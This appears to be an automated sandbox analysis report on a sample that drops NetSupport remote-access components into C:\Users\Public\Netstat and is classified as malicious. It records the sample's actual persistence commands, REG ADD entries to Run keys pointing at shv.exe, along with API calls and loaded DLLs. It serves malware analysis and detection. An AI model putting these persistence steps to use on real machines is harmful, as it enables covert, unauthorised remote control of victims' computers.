Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11032EE0 GetClipboardFormatNameA,SetClipboardData
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: Yara match | File source: 5.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.1afa5756820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 3492, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 7008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 6340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 3244, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\Public\Netstat\shv.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE18C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Netstat\shv.exe | Process token adjusted: Security
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 110B7A20 appears 39 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11146450 appears 1094 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11146EC0 appears 39 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 110278E0 appears 91 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 1116F010 appears 66 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11029450 appears 1793 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 111603E3 appears 74 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11173663 appears 35 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 1105DD10 appears 555 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11081BB0 appears 77 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 1105DE40 appears 51 times
Source: C:\Users\Public\Netstat\shv.exe | Code function: String function: 11164010 appears 64 times
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.1673741447.000001AFA58C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: classification engine | Classification label: mal92.rans.evad.winEXE@19/13@1/2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE18B6D8 GetLastError,FormatMessageW,LocalFree
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Netstat
Source: C:\Users\Public\Netstat\shv.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: unknown | Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown | Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgidebug.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
                                Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
                                Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                                Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: apphelp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: shfolder.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcichek.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mpr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: version.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winmm.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wsock32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wininet.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netutils.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: samcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: dbghelp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: dbgcore.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nslsp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: devobj.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msasn1.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcihooks.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: textshaping.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winsta.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wbemcomn.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mswsock.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: riched32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: riched20.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: usp10.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msls31.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: amsi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: userenv.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: profapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: dhcpcsvc6.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: dhcpcsvc.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: dnsapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wldp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pciinv.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: firewallapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: fwbase.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: iertutil.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: fwpolicyiomgr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: sspicli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winhttp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winnsi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: urlmon.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: srvcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: rasadhlp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: fwpuclnt.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: shfolder.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcichek.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mpr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: version.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winmm.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wsock32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wininet.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netutils.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: samcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nslsp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: devobj.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msasn1.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: shfolder.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcichek.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mpr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: version.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winmm.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wsock32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wininet.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netutils.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: samcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wtsapi32.dll
